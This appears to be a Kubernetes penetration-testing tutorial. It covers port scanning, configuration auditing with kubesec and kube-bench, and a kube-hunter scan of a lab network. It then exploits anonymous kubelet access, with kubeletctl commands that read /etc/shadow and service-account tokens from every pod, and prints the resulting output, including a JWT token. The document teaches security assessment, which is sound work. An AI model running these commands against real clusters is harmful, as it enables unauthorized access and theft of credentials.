Kubernetes Penetration Testing

Kubernetes is an orchestration system for containers. It allows for automated deployment and scaling of container clusters. It is frequently coupled with Docker.

Kubernetes is sometimes referred to as k8s.

System Components

  • Pods. These are units of execution that can be compromised of one or more containers.
  • Nodes. A node is a system responsible for running the pods. This is typically a physical or virtual hypervisor system. Nodes are either worker nodes, that run containers or master nodes that are responsible for managing the cluster.

The below table shows the inbound TCP ports Kubernetes uses for communication:

Port(s)PurposeNotes
6443Kubernetes API serverThis service lets you query and manipulate the state of objects in Kubernetes
2379-2380etcd server client APIetcd is a consistent and highly-available key-value store used as Kubernetes’ backing store for all cluster data.
10250Kubelet APINode agent.
10259kube-schedulerkube-scheduler watches for newly created Pods with no assigned node, and selects a node for them to run on.
10257kube-controller-managerControllers monitor the state of the cluster then make or request changes where needed.
30000-32767NodePort Services†Only found on worker nodes.

We can use Nmap to scan for the default ports:

nmap -n -T5 -sV -p 443,2379,6666,4194,6443,8443,8080,10250,10259,10257,10255,10256,9099,6782-6784,30000-32767,44134 127.0.0.1

POD Configuration Auditing

Pod’s can be defined in yaml documents:

kind: Pod
apiVersion: v1
metadata:
  name: example-pod
spec:
  containers:
    - image: nginx
      name: example-container

The pod can then be created using the kubectl command:

kubectl create -f pod.yaml 
pod/example-pod created
kubectl get pods
NAME          READY   STATUS              RESTARTS   AGE
example-pod   0/1     ContainerCreating   0          35s

The tool KubeSec can be used to audit these configuration files: https://github.com/controlplaneio/kubesec

kubectl can be used to export currently active POD configurations. First list the active POD’s

kubectl get pods -A

Then use kubectl to export the configuration;

kubectl get pod <podname> --namespace <namespace> -o yaml > podconfig.yaml

The configuration file can then be audited with kubesec.

./kubesec scan pod.yaml 
[
  {
    "object": "Pod/example-pod.default",
    "valid": true,
    "fileName": "pod.yaml",
    "message": "Passed with a score of 0 points",
    "score": 0,
    "scoring": {
      "advise": [
        {
          "id": "ApparmorAny",
          "selector": ".metadata .annotations .\"container.apparmor.security.beta.kubernetes.io/nginx\"",
          "reason": "Well defined AppArmor policies may provide greater protection from unknown threats. WARNING: NOT PRODUCTION READY",
          "points": 3
        },
        {
          "id": "ServiceAccountName",
          "selector": ".spec .serviceAccountName",
          "reason": "Service accounts restrict Kubernetes API access and should be configured with least privilege",
          "points": 3
        },
        {
          "id": "SeccompAny",
          "selector": ".metadata .annotations .\"container.seccomp.security.alpha.kubernetes.io/pod\"",
          "reason": "Seccomp profiles set minimum privilege and secure against unknown threats",
          "points": 1
        },
        {
          "id": "LimitsCPU",
          "selector": "containers[] .resources .limits .cpu",
          "reason": "Enforcing CPU limits prevents DOS via resource exhaustion",
          "points": 1
        },
        {
          "id": "LimitsMemory",
          "selector": "containers[] .resources .limits .memory",
          "reason": "Enforcing memory limits prevents DOS via resource exhaustion",
          "points": 1
        },
        {
          "id": "RequestsCPU",
          "selector": "containers[] .resources .requests .cpu",
          "reason": "Enforcing CPU requests aids a fair balancing of resources across the cluster",
          "points": 1
        },
        {
          "id": "RequestsMemory",
          "selector": "containers[] .resources .requests .memory",
          "reason": "Enforcing memory requests aids a fair balancing of resources across the cluster",
          "points": 1
        },
        {
          "id": "CapDropAny",
          "selector": "containers[] .securityContext .capabilities .drop",
          "reason": "Reducing kernel capabilities available to a container limits its attack surface",
          "points": 1
        },
        {
          "id": "CapDropAll",
          "selector": "containers[] .securityContext .capabilities .drop | index(\"ALL\")",
          "reason": "Drop all capabilities and add only those required to reduce syscall attack surface",
          "points": 1
        },
        {
          "id": "ReadOnlyRootFilesystem",
          "selector": "containers[] .securityContext .readOnlyRootFilesystem == true",
          "reason": "An immutable root filesystem can prevent malicious binaries being added to PATH and increase attack cost",
          "points": 1
        },
        {
          "id": "RunAsNonRoot",
          "selector": "containers[] .securityContext .runAsNonRoot == true",
          "reason": "Force the running image to run as a non-root user to ensure least privilege",
          "points": 1
        },
        {
          "id": "RunAsUser",
          "selector": "containers[] .securityContext .runAsUser -gt 10000",
          "reason": "Run as a high-UID user to avoid conflicts with the host's user table",
          "points": 1
        }
      ]
    }
  }
]


CIS Benchmarks Host Auditing

Kube-Bench can be used to audit a Kubernetes cluster configuration against CIS benchmarks. The software is available from here: https://github.com/aquasecurity/kube-bench

sudo ./kube-bench --config-dir `pwd`/cfg --config `pwd`/cfg/config.yaml 
[sudo] password for user: 
Warning: Kubernetes version was not auto-detected because kubectl could not connect to the Kubernetes server. This may be because the kubeconfig information is missing or has credentials that do not match the server. Assuming default version 1.18
Warning: Kubernetes version was not auto-detected because kubectl could not connect to the Kubernetes server. This may be because the kubeconfig information is missing or has credentials that do not match the server. Assuming default version 1.18
[INFO] 2 Etcd Node Configuration
[INFO] 2 Etcd Node Configuration Files
[PASS] 2.1 Ensure that the --cert-file and --key-file arguments are set as appropriate (Automated)
[PASS] 2.2 Ensure that the --client-cert-auth argument is set to true (Automated)
[PASS] 2.3 Ensure that the --auto-tls argument is not set to true (Automated)
[PASS] 2.4 Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate (Automated)
[PASS] 2.5 Ensure that the --peer-client-cert-auth argument is set to true (Automated)
[PASS] 2.6 Ensure that the --peer-auto-tls argument is not set to true (Automated)
[PASS] 2.7 Ensure that a unique Certificate Authority is used for etcd (Manual)

== Summary etcd ==
7 checks PASS
0 checks FAIL
0 checks WARN
0 checks INFO

[INFO] 4 Worker Node Security Configuration
[INFO] 4.1 Worker Node Configuration Files
[PASS] 4.1.1 Ensure that the kubelet service file permissions are set to 644 or more restrictive (Automated)
[PASS] 4.1.2 Ensure that the kubelet service file ownership is set to root:root (Automated)
[PASS] 4.1.3 If proxy kubeconfig file exists ensure permissions are set to 644 or more restrictive (Manual)
[PASS] 4.1.4 Ensure that the proxy kubeconfig file ownership is set to root:root (Manual)
[PASS] 4.1.5 Ensure that the --kubeconfig kubelet.conf file permissions are set to 644 or more restrictive (Automated)
[PASS] 4.1.6 Ensure that the --kubeconfig kubelet.conf file ownership is set to root:root (Manual)
[PASS] 4.1.7 Ensure that the certificate authorities file permissions are set to 644 or more restrictive (Manual)
[PASS] 4.1.8 Ensure that the client certificate authorities file ownership is set to root:root (Manual)
[PASS] 4.1.9 Ensure that the kubelet --config configuration file has permissions set to 644 or more restrictive (Automated)
[PASS] 4.1.10 Ensure that the kubelet --config configuration file ownership is set to root:root (Automated)
[INFO] 4.2 Kubelet
[FAIL] 4.2.1 Ensure that the anonymous-auth argument is set to false (Automated)
[FAIL] 4.2.2 Ensure that the --authorization-mode argument is not set to AlwaysAllow (Automated)
[PASS] 4.2.3 Ensure that the --client-ca-file argument is set as appropriate (Automated)
[PASS] 4.2.4 Ensure that the --read-only-port argument is set to 0 (Manual)
[PASS] 4.2.5 Ensure that the --streaming-connection-idle-timeout argument is not set to 0 (Manual)
[FAIL] 4.2.6 Ensure that the --protect-kernel-defaults argument is set to true (Automated)
[PASS] 4.2.7 Ensure that the --make-iptables-util-chains argument is set to true (Automated)
[PASS] 4.2.8 Ensure that the --hostname-override argument is not set (Manual)
[WARN] 4.2.9 Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture (Manual)
[WARN] 4.2.10 Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate (Manual)
[PASS] 4.2.11 Ensure that the --rotate-certificates argument is not set to false (Manual)
[PASS] 4.2.12 Verify that the RotateKubeletServerCertificate argument is set to true (Manual)
[WARN] 4.2.13 Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers (Manual)

KubeHunter

kube-hunter is an open-source tool that hunts for security issues in Kubernetes clusters. The software can be downloaded from here: https://github.com/aquasecurity/kube-hunter

Running the tool remotely against a Kubernetes cluster, we can see multiple issues have been identified:

./kube-hunter-linux-x86_64-refs.tags.v0.6.8 --active
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Interface scanning   (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 3
CIDR separated by a ',' (example - 192.168.0.0/16,!192.168.0.8/32,!192.168.1.0/24): 192.168.1.0/24
2022-07-22 15:00:11,950 INFO kube_hunter.modules.report.collector Started hunting
2022-07-22 15:00:11,956 INFO kube_hunter.modules.report.collector Discovering Open Kubernetes Services
2022-07-22 15:00:12,072 INFO kube_hunter.modules.report.collector Found open service "Kubelet API" at 192.168.1.133:10250
2022-07-22 15:00:12,075 INFO kube_hunter.modules.report.collector Found open service "Kubelet API" at 192.168.1.109:10250
2022-07-22 15:00:12,079 INFO kube_hunter.modules.report.collector Found open service "Kubelet API" at 192.168.1.76:10250
2022-07-22 15:00:12,080 INFO kube_hunter.modules.report.collector Found vulnerability "Anonymous Authentication" in 192.168.1.76:10250
2022-07-22 15:00:12,118 INFO kube_hunter.modules.report.collector Found vulnerability "Exposed Pods" in 192.168.1.76:10250
2022-07-22 15:00:12,119 INFO kube_hunter.modules.report.collector Found vulnerability "Cluster Health Disclosure" in 192.168.1.76:10250
2022-07-22 15:00:12,122 INFO kube_hunter.modules.report.collector Found open service "API Server" at 192.168.1.76:6443
2022-07-22 15:00:12,126 INFO kube_hunter.modules.report.collector Found vulnerability "Exposed Running Pods" in 192.168.1.76:10250
2022-07-22 15:00:12,128 INFO kube_hunter.modules.report.collector Found vulnerability "Exposed Kubelet Cmdline" in 192.168.1.76:10250
2022-07-22 15:00:12,131 INFO kube_hunter.modules.report.collector Found vulnerability "Exposed Container Logs" in 192.168.1.76:10250
2022-07-22 15:00:12,137 INFO kube_hunter.modules.report.collector Found vulnerability "Exposed Run Inside Container" in 192.168.1.76:10250
2022-07-22 15:00:12,139 INFO kube_hunter.modules.report.collector Found vulnerability "K8s Version Disclosure" in 192.168.1.76:6443
2022-07-22 15:00:12,151 INFO kube_hunter.modules.report.collector Found vulnerability "Exposed System Logs" in 192.168.1.76:10250
2022-07-22 15:00:12,515 INFO kube_hunter.modules.report.collector Found vulnerability "Exposed Existing Privileged Container(s) Via Secure Kubelet Port" in 192.168.1.76:10250

Nodes
+-------------+---------------+
| TYPE        | LOCATION      |
+-------------+---------------+
| Node/Master | 192.168.1.133 |
+-------------+---------------+
| Node/Master | 192.168.1.109 |
+-------------+---------------+
| Node/Master | 192.168.1.76  |
+-------------+---------------+

Detected Services
+-------------+---------------------+----------------------+
| SERVICE     | LOCATION            | DESCRIPTION          |
+-------------+---------------------+----------------------+
| Kubelet API | 192.168.1.76:10250  | The Kubelet is the   |
|             |                     | main component in    |
|             |                     | every Node, all pod  |
|             |                     | operations goes      |
|             |                     | through the kubelet  |
+-------------+---------------------+----------------------+
| Kubelet API | 192.168.1.133:10250 | The Kubelet is the   |
|             |                     | main component in    |
|             |                     | every Node, all pod  |
|             |                     | operations goes      |
|             |                     | through the kubelet  |
+-------------+---------------------+----------------------+
| Kubelet API | 192.168.1.109:10250 | The Kubelet is the   |
|             |                     | main component in    |
|             |                     | every Node, all pod  |
|             |                     | operations goes      |
|             |                     | through the kubelet  |
+-------------+---------------------+----------------------+
| API Server  | 192.168.1.76:6443   | The API server is in |
|             |                     | charge of all        |
|             |                     | operations on the    |
|             |                     | cluster.             |
+-------------+---------------------+----------------------+

Vulnerabilities
For further information about a vulnerability, search its ID in: 
https://avd.aquasec.com/
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| ID     | LOCATION           | MITRE CATEGORY       | VULNERABILITY        | DESCRIPTION          | EVIDENCE             |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV051 | 192.168.1.76:10250 | Privilege Escalation | Exposed Existing     | A malicious actor,   | The following        |
|        |                    | // Privileged        | Privileged           | that has confirmed   | exposed existing     |
|        |                    | container            | Container(s) Via     | anonymous access to  | privileged           |
|        |                    |                      | Secure Kubelet Port  | the API via the      | containers were not  |
|        |                    |                      |                      | kubelet's secure     | successfully abused  |
|        |                    |                      |                      | port, can leverage   | by                   |
|        |                    |                      |                      | the existing         | starting/modify...   |
|        |                    |                      |                      | privileged           |                      |
|        |                    |                      |                      | containers           |                      |
|        |                    |                      |                      | identified to damage |                      |
|        |                    |                      |                      | the host and         |                      |
|        |                    |                      |                      | potentially the      |                      |
|        |                    |                      |                      | whole cluster        |                      |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV043 | 192.168.1.76:10250 | Initial Access //    | Cluster Health       | By accessing the     | status: ok           |
|        |                    | General Sensitive    | Disclosure           | open /healthz        |                      |
|        |                    | Information          |                      | handler,             |                      |
|        |                    |                      |                      |     an attacker      |                      |
|        |                    |                      |                      | could get the        |                      |
|        |                    |                      |                      | cluster health state |                      |
|        |                    |                      |                      | without              |                      |
|        |                    |                      |                      | authenticating       |                      |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV036 | 192.168.1.76:10250 | Initial Access //    | Anonymous            | The kubelet is       | The following        |
|        |                    | Exposed sensitive    | Authentication       | misconfigured,       | containers have been |
|        |                    | interfaces           |                      | potentially allowing | successfully         |
|        |                    |                      |                      | secure access to all | breached.            |
|        |                    |                      |                      | requests on the      |                      |
|        |                    |                      |                      | kubelet,             | Pod namespace: kube- |
|        |                    |                      |                      |     without the need | flannel              |
|        |                    |                      |                      | to authenticate      |                      |
|        |                    |                      |                      |                      | Pod ID: kube...      |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV002 | 192.168.1.76:6443  | Initial Access //    | K8s Version          | The kubernetes       | v1.24.3              |
|        |                    | Exposed sensitive    | Disclosure           | version could be     |                      |
|        |                    | interfaces           |                      | obtained from the    |                      |
|        |                    |                      |                      | /version endpoint    |                      |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV040 | 192.168.1.76:10250 | Execution // Exec    | Exposed Run Inside   | An attacker could    | uname -a: rpc error: |
|        |                    | into container       | Container            | run an arbitrary     | code = Unknown desc  |
|        |                    |                      |                      | command inside a     | = failed to exec in  |
|        |                    |                      |                      | container            | container: failed to |
|        |                    |                      |                      |                      | start exec           |
|        |                    |                      |                      |                      | "86ddae...           |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV052 | 192.168.1.76:10250 | Discovery // Access  | Exposed Pods         | An attacker could    | count: 8             |
|        |                    | Kubelet API          |                      | view sensitive       |                      |
|        |                    |                      |                      | information about    |                      |
|        |                    |                      |                      | pods that are        |                      |
|        |                    |                      |                      |     bound to a Node  |                      |
|        |                    |                      |                      | using the /pods      |                      |
|        |                    |                      |                      | endpoint             |                      |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV046 | 192.168.1.76:10250 | Discovery // Access  | Exposed Kubelet      | Commandline flags    | cmdline: /usr/bin/ku |
|        |                    | Kubelet API          | Cmdline              | that were passed to  | belet--bootstrap-ku  |
|        |                    |                      |                      | the kubelet can be   | beconfig=/etc/kubern |
|        |                    |                      |                      | obtained from the    | etes/bootstrap-kubel |
|        |                    |                      |                      | pprof endpoints      | et.conf--kubeconfig  |
|        |                    |                      |                      |                      | ...                  |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV045 | 192.168.1.76:10250 | Discovery // Access  | Exposed System Logs  | System logs are      | Could not parse      |
|        |                    | Kubelet API          |                      | exposed from the     | system logs          |
|        |                    |                      |                      | /logs endpoint on    |                      |
|        |                    |                      |                      | the kubelet          |                      |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV038 | 192.168.1.76:10250 | Discovery // Access  | Exposed Running Pods | Outputs a list of    | 8 running pods       |
|        |                    | Kubelet API          |                      | currently running    |                      |
|        |                    |                      |                      | pods,                |                      |
|        |                    |                      |                      |     and some of      |                      |
|        |                    |                      |                      | their metadata,      |                      |
|        |                    |                      |                      | which can reveal     |                      |
|        |                    |                      |                      | sensitive            |                      |
|        |                    |                      |                      | information          |                      |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+
| KHV037 | 192.168.1.76:10250 | Discovery // Access  | Exposed Container    | Output logs from a   | coredns: .:53        |
|        |                    | Kubelet API          | Logs                 | running container    | [INFO]               |
|        |                    |                      |                      | are using the        | plugin/reload:       |
|        |                    |                      |                      | exposed              | Running              |
|        |                    |                      |                      | /containerLogs       | configuration MD5 =  |
|        |                    |                      |                      | endpoint             | db32ca3650231d74073f |
|        |                    |                      |                      |                      | f4cf814959a7         |
|        |                    |                      |                      |                      | Cor...               |
+--------+--------------------+----------------------+----------------------+----------------------+----------------------+

Further information on how to remediate the vulnerabilities identified can be found on the Kube-Hunter website: https://aquasecurity.github.io/kube-hunter/kbindex.html

If authentication is required to communicate a service account token can be passed:

./kube-hunter-linux-x86_64-refs.tags.v0.6.8 --active --service-account <service_token>

Exploiting Anonymous Kublet Authentication

Kubernetes uses client certificates, bearer tokens, or an authenticating proxy to authenticate API requests. Brute forcing these requests is unfeasible.

However, if anonymous access is enabled, and authorization is set to AlwaysAllow we can directly interface with the Kubelet API:

head -n 15 /var/lib/kubelet/config.yaml 
apiVersion: kubelet.config.k8s.io/v1beta1
authentication:
  anonymous:
    enabled: true
  webhook:
    cacheTTL: 0s
    enabled: true
  x509:
    clientCAFile: /etc/kubernetes/pki/ca.crt
authorization:
  mode: AlwaysAllow
  webhook:
    cacheAuthorizedTTL: 0s
    cacheUnauthorizedTTL: 0s
cgroupDriver: systemd

Restart the service after making the change:

systemctl restart kubelet

The API can now be queried directly using curl:

curl -k https://192.168.1.76:10250/pods
{"kind":"PodList","apiVersion":"v1","metadata":{},"items":[{"metadata":{"name":"kube-apiserver-master","namespace":"kube-system","uid":"6b09112839c4a4c5f099ad48e7cfed63","creationTimestamp":null,"labels":{"component":"kube-apiserver","tier":"control-plane"},"annotations":{"kubeadm.kubernetes.io/kube-apiserver.advertise-address.endpoint":"192.168.1.76:6443","kubernetes.io/config.hash":"6b09112839c4a4c5f099ad48e7cfed63","kubernetes.io/config.seen":"2022-07-22T13:53:31.425085559Z","kubernetes.io/config.source":"file"}},"spec":{"volumes":[{"name":"ca-certs","hostPath":{"path":"/etc/ssl/certs","type":"DirectoryOrCreate"}},{"name":"etc-ca-certificates","hostPath":{"path":"/etc/ca-certificates","type":"DirectoryOrCreate"}},{"name":"etc-pki","hostPath":{"path":"/etc/pki","type":"DirectoryOrCreate"}},{"name":"k8s-certs","hostPath":{"path":"/etc/kubernetes/pki","type":"DirectoryOrCreate"}},{"name":"usr-local-share-ca-certificates","hostPath":{"path

An easier way of interacting the service is to use the following tool: https://github.com/cyberark/kubeletctl

./kubeletctl_linux_amd64 --server 192.168.1.76 run "cat /etc/shadow" -i --all-pods
[*] Running command on all pods
1. Pod: kube-scheduler-master
   Namespace: kube-system
   Container: kube-scheduler
   Url: https://192.168.1.76:10250/run/kube-system/kube-scheduler-master/kube-scheduler
   Output: 
container not found ("kube-scheduler")


2. Pod: kube-controller-manager-master
   Namespace: kube-system
   Container: kube-controller-manager
   Url: https://192.168.1.76:10250/run/kube-system/kube-controller-manager-master/kube-controller-manager
   Output: 
container not found ("kube-controller-manager")


3. Pod: kube-proxy-gt456
   Namespace: kube-system
   Container: kube-proxy
   Url: https://192.168.1.76:10250/run/kube-system/kube-proxy-gt456/kube-proxy
   Output: 
container not found ("kube-proxy")


4. Pod: kube-apiserver-master
   Namespace: kube-system
   Container: kube-apiserver
   Url: https://192.168.1.76:10250/run/kube-system/kube-apiserver-master/kube-apiserver
   Output: 
container not found ("kube-apiserver")


5. Pod: coredns-6d4b75cb6d-2gxrm
   Namespace: kube-system
   Container: coredns
   Url: https://192.168.1.76:10250/run/kube-system/coredns-6d4b75cb6d-2gxrm/coredns
   Output: 
container not found ("coredns")


6. Pod: kube-flannel-ds-nk7cf
   Namespace: kube-flannel
   Container: kube-flannel
   Url: https://192.168.1.76:10250/run/kube-flannel/kube-flannel-ds-nk7cf/kube-flannel
   Output: 
root:!::0:::::
bin:!::0:::::
daemon:!::0:::::
adm:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
operator:!::0:::::
man:!::0:::::
postmaster:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
at:!::0:::::
squid:!::0:::::
xfs:!::0:::::
games:!::0:::::
cyrus:!::0:::::
vpopmail:!::0:::::
ntp:!::0:::::
smmsp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
ipsec:!:19149:0:99999:7:::

Service Account Access

Containers that need to communicate with the Kubernetes directly will hold a service account token under /var/run/secrets/kubernetes.io/serviceaccount/token. This is a JSON Web Token (JWT). Depending on the rights assigned to the token, we may be able to use this to further compromise the cluster.

./kubeletctl_linux_amd64 --server 192.168.1.76 run "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -i --all-pods
5. Pod: kube-flannel-ds-nk7cf
   Namespace: kube-flannel
   Container: kube-flannel
   Url: https://192.168.1.76:10250/run/kube-flannel/kube-flannel-ds-nk7cf/kube-flannel
   Output: 
eyJhbGciOiJSUzI1NiIsImtpZCI6IlEtVzNTcDg2QTQyZDN2OWdFQVRfSDEzMEdtdkgwNUlpZ1dib3hwNXRsb0UifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNjkwMDM0MDUwLCJpYXQiOjE2NTg0OTgwNTAsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJrdWJlLWZsYW5uZWwiLCJwb2QiOnsibmFtZSI6Imt1YmUtZmxhbm5lbC1kcy1uazdjZiIsInVpZCI6IjJmZjQ5NThiLWQ2OTMtNGZhNS1hOTBkLWFhNDE2MjUwNGNiYiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZmxhbm5lbCIsInVpZCI6IjYyMmU1NDc4LWViOWQtNDJmOC04Nzg2LTM0MjBmZmM3NmU5NyJ9LCJ3YXJuYWZ0ZXIiOjE2NTg1MDE2NTd9LCJuYmYiOjE2NTg0OTgwNTAsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDprdWJlLWZsYW5uZWw6Zmxhbm5lbCJ9.lvody5McZIXdXAiToTfJpBZmrnDGYXtaH_eUPJKbw1Boxqq67m8CRa-59SK7Vellzu9jOsAHdtq5ziEir1hJCJhVA85qATUpeArskKNyFX1bIgFCTgFsRvhi_BYtpOQ2-h8IX_qyybYoeFSfpCWo4ubS90ntYAH7AHyLKt6eteyXfTIXUz12Z53HFYVg9WWKKUSKa-sH6vrqLW1-BqglUuiL0MujEtXHqxv2H0Kj2ZV09zc7MHdF85ku_mKk4bOwv0v06iE0tpFIruv4MfZlyGHuivv2My-SwX8eVNjI03iisn66BH91f2yLbksjkblWjeva32OlcFJfelZYwgV3Kg


Kubesploit

Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent dedicated for containerized environments. The software can be downloaded from here: https://github.com/cyberark/kubesploit

Kubesploit supports a number of audit features:

  • Container breakout using mounting
  • Container breakout using docker.sock
  • Container breakout using CVE-2019-5736 exploit
  • Scan for Kubernetes cluster known CVEs
  • Port scanning with focus on Kubernetes services
  • Kubernetes service scan from within the container
  • Light kubeletctl
  • cGroup breakout
  • Kernel module breakout
  • Var log escape
  • Deepce: Docker enumeration (Open-Source project integrated as a module)
  • Vulnerability test: check which of kubesploit exploits your container is vulnerable to

Closing Thoughts

Kubernetes is generally secure by default in newer releases due to the use of strong authentication mechanisms.